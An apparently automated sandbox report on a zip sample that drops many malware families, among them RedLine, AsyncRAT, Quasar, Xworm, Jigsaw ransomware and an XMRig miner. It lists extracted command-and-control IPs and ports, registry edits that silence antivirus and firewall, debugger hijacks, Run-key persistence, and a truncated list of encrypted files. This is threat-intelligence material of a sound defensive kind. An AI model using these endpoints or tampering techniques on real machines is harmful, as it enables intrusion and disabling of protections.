Analysis
-
max time kernel
164s -
max time network
355s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-11-2024 23:42
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.zip
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.zip
-
Size
4KB
-
MD5
ef8cefd3add0abb43471ade5c7c0e5cb
-
SHA1
37d88e8a6a8bff50c40dee86ffdf2963b85a6cb6
-
SHA256
d9effa261325842f2c4a3eab4af0b32ef4184af057ab10a6f571756acca51258
-
SHA512
9de9f6841b9cbbec637668708cf36b1a2ed59ad0ed364763b4b3f67d046b2057f084a9a0ded95d22677c9beec9b818d287c474c856af02b1a3e2a8eadf4d8c07
-
SSDEEP
96:3Bf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEQ:3BfwncSf8Cv3w9DZjKXjmBIKEvLs97DX
Malware Config
Extracted
redline
185.215.113.9:12617
Extracted
asyncrat
0.5.7B
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
xworm
91.92.240.41:7000
-
Install_directory
%ProgramData%
-
install_file
voldec.exe
Extracted
redline
newbundle2
185.215.113.67:15206
Extracted
quasar
1.4.1
Test
193.161.193.99:35184
67.205.154.243:35184
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
MS Build Tools
-
subdirectory
Microsoft-Build-Tools
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/5016-2463-0x0000000000400000-0x000000000041A000-memory.dmp family_xworm C:\Users\Admin\Desktop\Files\XClient.exe family_xworm -
Detects ZharkBot payload 2 IoCs
ZharkBot is a botnet written C++.
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\q1wnx5ir.exe zharkcore C:\Users\Admin\Desktop\Files\kitty.exe zharkcore -
Gh0st RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\server.exe family_gh0strat -
Gh0strat family
-
Jigsaw Ransomware
Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.
-
Jigsaw family
-
Modifies security service 2 TTPs 3 IoCs
Processes:
sysmablsvr.exesysarddrvs.exesysvplervcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe -
Phorphiex family
-
Phorphiex payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\tt.exe family_phorphiex C:\Users\Admin\Desktop\Files\11.exe family_phorphiex C:\Users\Admin\Desktop\Files\a.exe family_phorphiex C:\Users\Admin\Desktop\Files\o.exe family_phorphiex C:\Users\Admin\Desktop\Files\tpeinf.exe family_phorphiex -
Quasar family
-
Quasar payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\Client-built.exe family_quasar behavioral1/memory/196-2991-0x0000000000D30000-0x0000000001054000-memory.dmp family_quasar C:\Users\Admin\Desktop\Files\ardara.exe family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\cookie250.exe family_redline behavioral1/memory/5728-705-0x00000000004D0000-0x0000000000522000-memory.dmp family_redline C:\Users\Admin\Desktop\Files\newbundle2.exe family_redline behavioral1/memory/1756-2465-0x0000000000FB0000-0x0000000001002000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\B92C.tmp.x.exe family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
3404819980.exewinupsecvmgr.exedescription pid process target process PID 1512 created 3352 1512 3404819980.exe Explorer.EXE PID 1512 created 3352 1512 3404819980.exe Explorer.EXE PID 5708 created 3352 5708 winupsecvmgr.exe Explorer.EXE PID 5708 created 3352 5708 winupsecvmgr.exe Explorer.EXE PID 5708 created 3352 5708 winupsecvmgr.exe Explorer.EXE -
Processes:
sysvplervcs.exesysarddrvs.exesysmablsvr.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysarddrvs.exe -
Xmrig family
-
Xworm family
-
Zharkbot family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\AsyncClient.exe family_asyncrat -
Renames multiple (1000) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral1/memory/5708-1676-0x00007FF75E330000-0x00007FF75E8C7000-memory.dmp xmrig behavioral1/memory/5980-1797-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-2166-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-2427-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-2960-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-3042-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-3228-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-3269-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-3310-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig behavioral1/memory/5980-3491-0x00007FF6B7B20000-0x00007FF6B830F000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3116 powershell.exe 3000 powershell.exe 6880 powershell.exe 7668 powershell.exe 3100 powershell.exe 2788 powershell.exe 2708 powershell.exe 7100 powershell.exe 1904 powershell.exe 5624 powershell.exe 5984 powershell.exe 2924 powershell.exe 3364 powershell.exe 3396 powershell.exe 2360 powershell.exe 3856 powershell.exe 6380 powershell.exe 3456 powershell.exe 896 powershell.exe 6676 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 6 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe\debugger = "ctfmon.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe\debugger = "ctfmon.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe\debugger = "ctfmon.exe" reg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 220 netsh.exe 2368 netsh.exe -
Deletes itself 1 IoCs
Processes:
drpbx.exepid process 2848 drpbx.exe -
Executes dropped EXE 48 IoCs
Processes:
4363463463464363463463463.exeSharpHound.exeASUFER.exesubin.exesubin.exesubin.exesc.exesubin.exewmild.exeStatement-415322024.exeITplan.exesc.exeJigsaw.exedrpbx.exe%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.execookie250.exett.exenjrat.exe11.exesysmablsvr.exesysarddrvs.exerundll32.exe337368602.exe686511152.exe1280732738.exe241632213.exesoftina.exeJAVA_V3.exea.exegawdth.exeq1wnx5ir.execlamer.exesysvplervcs.exelofsawd.exeserver.exe3320025174.exe881826859.exesmell-the-roses.exeAsyncClient.exejcuqdd.exeJAVA_V3.exe3404819980.exe1327623073.exeJAVA_V3.exewinupsecvmgr.exe606615002.exe128037285.exej86piuq9.exepid process 1888 4363463463464363463463463.exe 3100 SharpHound.exe 5716 ASUFER.exe 2108 subin.exe 5504 subin.exe 1428 subin.exe 5956 sc.exe 1432 subin.exe 5484 wmild.exe 4732 Statement-415322024.exe 5964 ITplan.exe 5040 sc.exe 1860 Jigsaw.exe 2848 drpbx.exe 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5728 cookie250.exe 4316 tt.exe 580 njrat.exe 4480 11.exe 4884 sysmablsvr.exe 4256 sysarddrvs.exe 1240 rundll32.exe 4964 337368602.exe 3660 686511152.exe 6012 1280732738.exe 2940 241632213.exe 5876 softina.exe 3668 JAVA_V3.exe 4596 a.exe 1140 gawdth.exe 5408 q1wnx5ir.exe 4996 clamer.exe 396 sysvplervcs.exe 868 lofsawd.exe 3924 server.exe 5524 3320025174.exe 1256 881826859.exe 5288 smell-the-roses.exe 4904 AsyncClient.exe 3556 jcuqdd.exe 2312 JAVA_V3.exe 1512 3404819980.exe 2400 1327623073.exe 3536 JAVA_V3.exe 5708 winupsecvmgr.exe 564 606615002.exe 4232 128037285.exe 2716 j86piuq9.exe -
Loads dropped DLL 2 IoCs
Processes:
smell-the-roses.exepid process 5288 smell-the-roses.exe 5288 smell-the-roses.exe -
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\gdn5yfjd.exe themida -
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe vmprotect behavioral1/memory/5436-688-0x0000000000400000-0x0000000000825000-memory.dmp vmprotect behavioral1/memory/5436-689-0x0000000000400000-0x0000000000825000-memory.dmp vmprotect behavioral1/memory/5436-832-0x0000000000400000-0x0000000000825000-memory.dmp vmprotect behavioral1/memory/5436-3261-0x0000000000400000-0x0000000000825000-memory.dmp vmprotect -
Processes:
sysmablsvr.exesysarddrvs.exesysvplervcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Jigsaw.exett.exe11.exerundll32.exea.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" Jigsaw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysarddrvs.exe" 11.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" a.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
mstsc.exedescription ioc process File opened (read-only) \??\A: mstsc.exe File opened (read-only) \??\E: mstsc.exe File opened (read-only) \??\I: mstsc.exe File opened (read-only) \??\K: mstsc.exe File opened (read-only) \??\L: mstsc.exe File opened (read-only) \??\S: mstsc.exe File opened (read-only) \??\Z: mstsc.exe File opened (read-only) \??\G: mstsc.exe File opened (read-only) \??\H: mstsc.exe File opened (read-only) \??\J: mstsc.exe File opened (read-only) \??\N: mstsc.exe File opened (read-only) \??\Q: mstsc.exe File opened (read-only) \??\R: mstsc.exe File opened (read-only) \??\X: mstsc.exe File opened (read-only) \??\Y: mstsc.exe File opened (read-only) \??\W: mstsc.exe File opened (read-only) \??\B: mstsc.exe File opened (read-only) \??\M: mstsc.exe File opened (read-only) \??\O: mstsc.exe File opened (read-only) \??\P: mstsc.exe File opened (read-only) \??\T: mstsc.exe File opened (read-only) \??\U: mstsc.exe File opened (read-only) \??\V: mstsc.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
Processes:
flow ioc 438 discord.com 1 raw.githubusercontent.com 7 bitbucket.org 45 raw.githubusercontent.com 194 raw.githubusercontent.com 321 discord.com 365 pastebin.com 3 bitbucket.org 329 discord.com 351 discord.com 370 pastebin.com 371 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 ip-api.com -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
rundll32.exedescription ioc process File created C:\autorun.inf rundll32.exe File opened for modification C:\autorun.inf rundll32.exe File created D:\autorun.inf rundll32.exe File created F:\autorun.inf rundll32.exe File opened for modification F:\autorun.inf rundll32.exe -
Drops file in System32 directory 3 IoCs
Processes:
cmd.exedescription ioc process File created C:\WINDOWS\SysWOW64\dhcp\ver1.0 cmd.exe File created C:\Windows\SysWOW64\readcac.exe cmd.exe File opened for modification C:\Windows\SysWOW64\readcac.exe cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 6896 tasklist.exe 7292 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exepid process 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
winupsecvmgr.exedescription pid process target process PID 5708 set thread context of 1060 5708 winupsecvmgr.exe conhost.exe PID 5708 set thread context of 5980 5708 winupsecvmgr.exe dwm.exe -
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\ASUFER.exe upx behavioral1/memory/5716-36-0x0000000000400000-0x0000000000429000-memory.dmp upx behavioral1/memory/5716-73-0x0000000000400000-0x0000000000429000-memory.dmp upx C:\Windows\ehome\wmild.exe upx behavioral1/memory/5484-84-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral1/memory/5484-110-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral1/memory/5484-111-0x0000000000400000-0x00000000006FB000-memory.dmp upx behavioral1/memory/5484-114-0x0000000000400000-0x00000000006FB000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
drpbx.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorStoreLogo.scale-200_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\Tentative.scale-150_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-80_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.scale-100_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-150.png drpbx.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\plugin.jar.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-black\PowerAutomateAppIcon.scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeBadge.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreMedTile.scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_x64__8wekyb3d8bbwe\Assets\TipsBadgeLogo.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-140.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.altform-unplated_targetsize-32.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-48_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\contrast-white\NotepadAppList.scale-200.png drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.tree.dat drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-400.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsWideTile.scale-200_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-RTL.gif drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextLight.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-256_altform-unplated.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif drpbx.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Store\Square150x150Logo.scale-400.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-400.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-60_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.29231.0_x64__8wekyb3d8bbwe\logo.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-32.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\iheart-radio.scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-black\CameraAppList.targetsize-20_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-16_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-256_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\CameraAppList.targetsize-80.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\RunningLate.scale-80.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\TipsAppList.scale-200_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.targetsize-80_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintMedTile.scale-400.png drpbx.exe File created C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\TipsSmallTile.scale-200_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-100_contrast-black.png drpbx.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\Notifications\SoftLandingAssetDark.gif.fun drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-24.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-30_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\SnipSketchSplashScreen.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\Images\Wide310x150Logo.scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-200.png drpbx.exe File opened for modification C:\Program 